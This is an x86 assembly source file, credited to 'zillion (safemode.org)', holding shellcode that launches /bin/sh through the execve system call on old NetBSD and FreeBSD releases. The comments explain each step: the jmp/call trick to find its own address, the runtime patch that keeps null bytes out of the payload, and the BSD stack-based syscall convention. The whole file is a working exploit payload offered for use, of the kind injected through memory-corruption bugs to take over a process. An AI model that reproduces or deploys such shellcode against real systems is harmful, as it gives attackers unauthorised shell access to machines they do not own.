;
; NetBSD /bin/sh execve assembly tested to work on 1.5.2
; Written by zillion (safemode.org)
;
; This code also works on FreeBSD (tested 4.5 and 4.6)
;
; Layout: jmp/call trick to get the address of the trailing string,
; then build argv[] in place and invoke execve (BSD syscall 59) via int 0x80.
; BSD passes syscall arguments on the stack with a dummy return slot on top.
;

BITS 32

        jmp short callit            ; jump forward to the call
doit:
        xor eax, eax                ; eax = 0 (used for NUL byte and NULL pointers)
        pop esi                     ; esi = address of '/bin/sh#' (pushed by call)
        mov byte [esi + 7], al      ; overwrite '#' with NUL terminator
        lea ebx, [esi]              ; ebx = pointer to "/bin/sh"
        mov dword [esi + 8], ebx    ; argv[0] = "/bin/sh"
        mov dword [esi + 12], eax   ; argv[1] = NULL
        push eax                    ; envp = NULL
        lea ecx, [esi + 8]          ; ecx = argv
        push ecx                    ; argv
        push esi                    ; path = "/bin/sh"
        mov al, 59                  ; SYS_execve on NetBSD/FreeBSD
        push eax                    ; dummy return address slot (BSD convention)
        int 0x80                    ; execve(path, argv, envp)
callit:
        call doit                   ; pushes address of string below, jumps back
        db '/bin/sh#'               ; path string; '#' is patched to NUL at runtime